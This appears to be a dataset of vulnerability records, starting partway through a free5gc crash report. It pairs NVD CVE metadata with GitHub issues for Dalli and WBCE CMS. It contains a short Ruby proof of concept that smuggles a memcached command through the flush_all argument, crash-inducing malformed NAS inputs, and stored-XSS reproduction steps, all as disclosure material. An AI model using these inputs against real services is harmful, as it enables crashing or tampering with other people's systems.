/home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:95 +0x22d github.com/free5gc/amf/nas.Dispatch(0xc000118580, 0xe3727a, 0xb, 0x2e, 0xc0004e1b00, 0x20, 0xc0004e1b00) /home/p1sec/free5gc/NFs/amf/nas/dispatch.go:22 +0x251 github.com/free5gc/amf/nas.HandleNAS(0xc0003d3e60, 0x2e, 0xc00026e3c0, 0x15, 0x20) /home/p1sec/free5gc/NFs/amf/nas/handler.go:39 +0x178 github.com/free5gc/amf/ngap.HandleUplinkNasTransport(0xc000123e80, 0xc0004e09e0) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:233 +0x701 github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc000402120, 0xc0000c8000, 0x41, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:49 +0x527 github.com/free5gc/amf/ngap/service.handleConnection(0xc000402120, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` This happens also with an oversized IE value, e.g. with 5G MM Capabilities: ``` 2021-03-08T13:49:59Z [INFO][AMF][NGAP][172.27.128.253:38412] Handle Initial UE Message panic: runtime error: slice bounds out of range [:32] with length 13 goroutine 7 [running]: github.com/free5gc/nas/nasMessage.(*RegistrationRequest).DecodeRegistrationRequest(0xc000295e10, 0xc0001c1558) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nasMessage/NAS_RegistrationRequest.go:195 +0x1b57 github.com/free5gc/nas.(*Message).GmmMessageDecode(0xc00047c0a0, 0xc0001c1558, 0x10000000000000b, 0xc0001c12d0) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nas.go:201 +0x2de github.com/free5gc/nas.(*Message).PlainNasDecode(0xc00047c0a0, 0xc0001c1558, 0xc0001c1510, 0x2) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nas.go:175 +0x58 github.com/free5gc/amf/nas/nas_security.Decode(0xc0004ed600, 0xe3727a, 0xb, 0xc0003926c0, 0x3b, 0x40, 0x11, 0xc0004d4500, 0xcad660) /home/p1sec/free5gc/NFs/amf/nas/nas_security/security.go:136 +0x452 github.com/free5gc/amf/nas.HandleNAS(0xc000408240, 0xf, 0xc0003926c0, 0x3b, 0x40) /home/p1sec/free5gc/NFs/amf/nas/handler.go:33 +0xaa github.com/free5gc/amf/ngap.HandleInitialUEMessage(0xc00030e180, 0xc000312ea0) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:1003 +0x4dc github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc000277d70, 0xc0005f8000, 0x66, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:47 +0x3bb github.com/free5gc/amf/ngap/service.handleConnection(0xc000277d70, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` <br/> Providing malformed 5GSID can trigger several additional crashes in the `GutiToString` or `SuciToString` functions: ``` 2021-03-08T12:22:45Z [INFO][AMF][GMM][AMF_UE_NGAP_ID:12] Handle Registration Request panic: runtime error: slice bounds out of range [:4] with capacity 1 goroutine 7 [running]: github.com/free5gc/nas/nasConvert.GutiToString(0xc000479530, 0x1, 0x1, 0xc000479530, 0x0, 0x0, 0x0, 0x0) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nasConvert/MobileIdentity5GS.go:98 +0x386 github.com/free5gc/amf/gmm.HandleRegistrationRequest(0xc0005bb080, 0xe3727a, 0xb, 0xf, 0xc000351110, 0xc000743530, 0xb75bb2) /home/p1sec/free5gc/NFs/amf/gmm/handler.go:435 +0x111d github.com/free5gc/amf/gmm.DeRegistered(0xc000452120, 0xe373b9, 0xb, 0xc0004526f0) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:30 +0x3ef github.com/free5gc/fsm.(*FSM).SendEvent(0xc000386ab0, 0xc000452120, 0xe373b9, 0xb, 0xc0004526f0, 0x0, 0xcb6ba0) /home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:95 +0x22d github.com/free5gc/amf/nas.Dispatch(0xc0005bb080, 0xe3727a, 0xb, 0xf, 0xc00000cca0, 0x20, 0xc00000cca0) /home/p1sec/free5gc/NFs/amf/nas/dispatch.go:22 +0x251 github.com/free5gc/amf/nas.HandleNAS(0xc0003d5e60, 0xf, 0xc0002e86c0, 0x12, 0x20) /home/p1sec/free5gc/NFs/amf/nas/handler.go:39 +0x178 github.com/free5gc/amf/ngap.HandleInitialUEMessage(0xc0000ca180, 0xc000316180) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:1003 +0x4dc github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc00013fda0, 0xc0004d2000, 0x3d, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:47 +0x3bb github.com/free5gc/amf/ngap/service.handleConnection(0xc00013fda0, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` or ``` 2021-03-08T12:27:02Z [INFO][AMF][GMM][AMF_UE_NGAP_ID:53] Handle Registration Request panic: runtime error: index out of range [2] with length 1 goroutine 49 [running]: github.com/free5gc/nas/nasConvert.SuciToString(0xc0002dcb20, 0x1, 0x1, 0xc0002dcb20, 0x0, 0x0, 0x0) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nasConvert/MobileIdentity5GS.go:36 +0xaa9 github.com/free5gc/amf/gmm.HandleRegistrationRequest(0xc000113080, 0xe3727a, 0xb, 0xf, 0xc000281450, 0xc000075530, 0xb75bb2) /home/p1sec/free5gc/NFs/amf/gmm/handler.go:431 +0xd9c github.com/free5gc/amf/gmm.DeRegistered(0xc000069f20, 0xe373b9, 0xb, 0xc0003d2780) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:30 +0x3ef github.com/free5gc/fsm.(*FSM).SendEvent(0xc000304b00, 0xc000069f20, 0xe373b9, 0xb, 0xc0003d2780, 0x0, 0xcb6ba0) /home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:95 +0x22d github.com/free5gc/amf/nas.Dispatch(0xc000113080, 0xe3727a, 0xb, 0xf, 0xc000628b60, 0x20, 0xc000628b60) /home/p1sec/free5gc/NFs/amf/nas/dispatch.go:22 +0x251 github.com/free5gc/amf/nas.HandleNAS(0xc0003de000, 0xf, 0xc000480240, 0x12, 0x20) /home/p1sec/free5gc/NFs/amf/nas/handler.go:39 +0x178 github.com/free5gc/amf/ngap.HandleInitialUEMessage(0xc0004c0180, 0xc0000981a0) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:1003 +0x4dc github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc00009a140, 0xc00054e000, 0x3d, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:47 +0x3bb github.com/free5gc/amf/ngap/service.handleConnection(0xc00009a140, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` or ``` 2021-03-08T13:29:29Z [INFO][AMF][GMM][AMF_UE_NGAP_ID:1] Handle Registration Request panic: runtime error: index out of range [4] with length 4 goroutine 33 [running]: github.com/free5gc/nas/nasConvert.SuciToString(0xc00054a588, 0x4, 0x4, 0xc00054a588, 0x0, 0x0, 0x0) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nasConvert/MobileIdentity5GS.go:53 +0xa81 github.com/free5gc/amf/gmm.HandleRegistrationRequest(0xc00054e000, 0xe3727a, 0xb, 0xf, 0xc0005540d0, 0xc0004e5530, 0xb75bb2) /home/p1sec/free5gc/NFs/amf/gmm/handler.go:431 +0xd9c github.com/free5gc/amf/gmm.DeRegistered(0xc00048cba0, 0xe373b9, 0xb, 0xc00048ced0) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:30 +0x3ef github.com/free5gc/fsm.(*FSM).SendEvent(0xc0002d6670, 0xc00048cba0, 0xe373b9, 0xb, 0xc00048ced0, 0x0, 0xcb6ba0) /home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:95 +0x22d github.com/free5gc/amf/nas.Dispatch(0xc00054e000, 0xe3727a, 0xb, 0xf, 0xc00053afa0, 0x20, 0xc00053afa0) /home/p1sec/free5gc/NFs/amf/nas/dispatch.go:22 +0x251 github.com/free5gc/amf/nas.HandleNAS(0xc0004c2240, 0xf, 0xc00049a940, 0x15, 0x20) /home/p1sec/free5gc/NFs/amf/nas/handler.go:39 +0x178 github.com/free5gc/amf/ngap.HandleInitialUEMessage(0xc0004b2000, 0xc000508880) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:1003 +0x4dc github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc000304170, 0xc00051e000, 0x40, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:47 +0x3bb github.com/free5gc/amf/ngap/service.handleConnection(0xc000304170, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` <br/> Finally, it seems using any kind of LADN Indicator within the 5G Registration Request message leads to the AMF getting stuck, consuming CPU and memory forever, and not responding on the SCTP socket anymore. The process gets finally killed by the Linux kernel. For instance sending a NAS Registration Request with the following LADN Indicator structure: ``` ### LADNInd ### <T : 116> <L : 8> <V : 0x0000000000000000> ``` Leads to this situation: ``` [4410188.716481] Out of memory: Killed process 1955374 (amf) total-vm:19664848kB, anon-rss:7375620kB, file-rss:0kB, shmem-rss:0kB, UID:1000 pgtables:22604kB oom_score_adj:0 [4410189.087583] oom_reaper: reaped process 1955374 (amf), now anon-rss:40kB, file-rss:0kB, shmem-rss:0kB ```
[Bugs] AMF breaks due to malformed NAS message
https://api.github.com/repos/free5gc/free5gc/issues/198/comments
4
2021-04-26T13:42:33Z
2023-12-04T08:48:27Z
https://github.com/free5gc/free5gc/issues/198
867,719,689
198
4,410
CVE-2022-4064
2022-11-19T19:15:09.780
A vulnerability was found in Dalli. It has been classified as problematic. Affected is the function self.meta_set of the file lib/dalli/protocol/meta/request_formatter.rb of the component Meta Protocol Handler. The manipulation leads to injection. The exploit has been disclosed to the public and may be used. The name of the patch is 48d594dae55934476fec61789e7a7c3700e0f50d. It is recommended to apply a patch to fix this issue. VDB-214026 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/commit/48d594dae55934476fec61789e7a7c3700e0f50d" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/issues/932" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/pull/933" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214026" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/commit/48d594dae55934476fec61789e7a7c3700e0f50d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/issues/932" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/petergoldstein/dalli/pull/933" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214026" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dalli_project:dalli:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "1E4D2EAA-00C7-487E-9FCF-0C454555528E", "versionEndExcluding": "3.2.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "-", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/petergoldstein/dalli/issues/932
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "petergoldstein", "dalli" ]
Hi there, I'm a security researcher currently doing research on Memcached wrappers vulnerabilities. I was doing some source code reviewing on your wrapper and noticed that the `flush_all` method on the meta protocol takes a delay value and passes it to the server without any checks, which can be used to smuggle commands to the Memcached server if an attacker has control over the value passed to the flush_all method. https://github.com/petergoldstein/dalli/blob/5588d98f79eb04a9abcaeeff3263e08f93468b30/lib/dalli/protocol/meta.rb#L137-L140 https://github.com/petergoldstein/dalli/blob/5588d98f79eb04a9abcaeeff3263e08f93468b30/lib/dalli/protocol/meta/request_formatter.rb#L76-L81 ### Proof of Concept ```ruby require 'dalli' # Proof of Concept by @xhzeem $mcmeta = Dalli::Client.new('localhost:11211', protocol: :meta) $mcmeta.set('xhzeem','meta') $mcmeta.get("xhzeem") # b64_if_reg_match(\s) puts $mcmeta.flush_all("\nset xhzeem 1 1000 8\ninjected") # :D ``` ### Suggested Fix: You should just add a simple check for the `delay` type and confirm it's a number or keep the 0 value.
Meta protocol flush_all method is vulnerable to code injection (Lack of input type check)
https://api.github.com/repos/petergoldstein/dalli/issues/932/comments
7
2022-10-25T17:09:25Z
2022-10-29T13:32:37Z
https://github.com/petergoldstein/dalli/issues/932
1,422,799,445
932
4,411
CVE-2022-45012
2022-11-21T15:15:11.537
A cross-site scripting (XSS) vulnerability in the Modify Page module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Source field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10/cve" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10/cve" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gozan10/cve/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gozan10", "cve" ]
Exploit Title: XSS Stored Vulnerability in WBCE Version: 1.5.4 Date: 03/11/2022 Exploit Author: Gozan Contact: https://github.com/gozan10 Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS) Vendor: WBCE CMS Description: XSS Stored exitst in Section name field allow attacker excute arbitrary web script First choose Add Page and fill in all information and click Add, after that click Manage Sections ![image](https://user-images.githubusercontent.com/70020521/199734396-ba7caddd-3320-4d4d-8c87-ec24ce216045.png) In the section Name field choose Source button and write payload XSS. ![image](https://user-images.githubusercontent.com/70020521/199735957-8e4dca69-7ea4-4057-ad94-4433f12fa84e.png) inject javascript ![image](https://user-images.githubusercontent.com/70020521/199736292-d850e514-9150-41e7-9245-b24f542df8ad.png) Excute javascript code ![image](https://user-images.githubusercontent.com/70020521/199736552-53ba1bab-6b76-4249-a004-ba88acc2f8e9.png)
CVE_WBCE
https://api.github.com/repos/gozan10/cve/issues/1/comments
0
2022-11-03T13:47:25Z
2022-11-03T15:24:48Z
https://github.com/gozan10/cve/issues/1
1,434,692,988
1
4,412
CVE-2022-45013
2022-11-21T15:15:11.783
A cross-site scripting (XSS) vulnerability in the Show Advanced Option module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Section Header field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gozan10/cve/issues/2
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gozan10", "cve" ]
Exploit Title: XSS Stored Vulnerability in WBCE Version: 1.5.4 Date: 04/11/2022 Exploit Author: Gozan Contact: https://github.com/gozan10 Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS) Vendor: WBCE CMS Description: XSS Stored exitst in Section Header field allow attacker excute arbitrary web script First choose Settings and find Search Settings field then choose button Show Advanced Options ![image](https://user-images.githubusercontent.com/70020521/199873358-5551b044-1f06-4429-8d0e-ed5842e94b24.png) In the section Header field write payload XSS. ![image](https://user-images.githubusercontent.com/70020521/199873674-a98fd3fb-f14e-40df-90c4-be05a1e035a1.png) After finish click button PC in Pages ![image](https://user-images.githubusercontent.com/70020521/199874012-bbcc0833-90f3-455f-9622-aed221ba8341.png) then type search and press search button ![image](https://user-images.githubusercontent.com/70020521/199874276-a50ec0aa-5f62-49c7-88ea-d20473c54689.png) Excute javascript code ![image](https://user-images.githubusercontent.com/70020521/199874332-d4418146-4ab9-4211-94f6-6999dea9aeb2.png)
CVE_WBCE_1
https://api.github.com/repos/gozan10/cve/issues/2/comments
0
2022-11-04T02:34:32Z
2022-11-04T02:48:02Z
https://github.com/gozan10/cve/issues/2
1,435,463,262
2
4,413
CVE-2022-45014
2022-11-21T15:15:12.023
A cross-site scripting (XSS) vulnerability in the Search Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Results Header field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gozan10/cve/issues/3
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gozan10", "cve" ]
Exploit Title: XSS Stored Vulnerability in WBCE Version: 1.5.4 Date: 04/11/2022 Exploit Author: Gozan Contact: https://github.com/gozan10 Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS) Vendor: WBCE CMS Description: XSS Stored exitst in Section Results Header field allow attacker excute arbitrary web script First choose Settings and find Search Settings field then choose button Show Advanced Options ![image](https://user-images.githubusercontent.com/70020521/199876624-ee0d745a-c30f-4279-af79-c666b86611cc.png) In the section Results Header field write payload XSS. ![image](https://user-images.githubusercontent.com/70020521/199876843-7087f03a-5201-413a-8fa6-a6637fad8e6e.png) After finish click button PC in Pages ![image](https://user-images.githubusercontent.com/70020521/199876912-663d9829-73e9-4e76-90aa-221f0a964832.png) then type search and press search button ![image](https://user-images.githubusercontent.com/70020521/199876974-82e5d394-107f-494d-8137-80cf360c6a04.png) Excute javascript code ![image](https://user-images.githubusercontent.com/70020521/199877054-fb0095ab-2b94-45de-ae50-b1a0166cc58e.png)
CVE_WBCE_2
https://api.github.com/repos/gozan10/cve/issues/3/comments
0
2022-11-04T03:04:55Z
2022-11-04T03:14:06Z
https://github.com/gozan10/cve/issues/3
1,435,479,175
3
4,414
CVE-2022-45015
2022-11-21T15:15:12.247
A cross-site scripting (XSS) vulnerability in the Search Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Results Footer field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gozan10/cve/issues/4
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gozan10", "cve" ]
Exploit Title: XSS Stored Vulnerability in WBCE Version: 1.5.4 Date: 04/11/2022 Exploit Author: Gozan Contact: https://github.com/gozan10 Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS) Vendor: WBCE CMS Description: XSS Stored exitst in Section Results Footer field allow attacker excute arbitrary web script First choose Settings and find Search Settings field then choose button Show Advanced Options. In the section Results Footer field write payload XSS. ![image](https://user-images.githubusercontent.com/70020521/199877944-3d793d10-d55a-4045-848d-427850022326.png) After finish click button PC in Pages then type search and press search button ![image](https://user-images.githubusercontent.com/70020521/199878056-07d7caf8-886b-4258-a466-d4b4a9e76c00.png) Excute javascript code ![image](https://user-images.githubusercontent.com/70020521/199878100-6256499c-5a91-4c80-ac52-2790da796090.png)
CVE_WBCE_3
https://api.github.com/repos/gozan10/cve/issues/4/comments
0
2022-11-04T03:22:32Z
2022-11-04T03:22:32Z
https://github.com/gozan10/cve/issues/4
1,435,489,408
4
4,415
CVE-2022-45016
2022-11-21T15:15:12.320
A cross-site scripting (XSS) vulnerability in the Search Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Footer field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gozan10/cve/issues/5" } ]
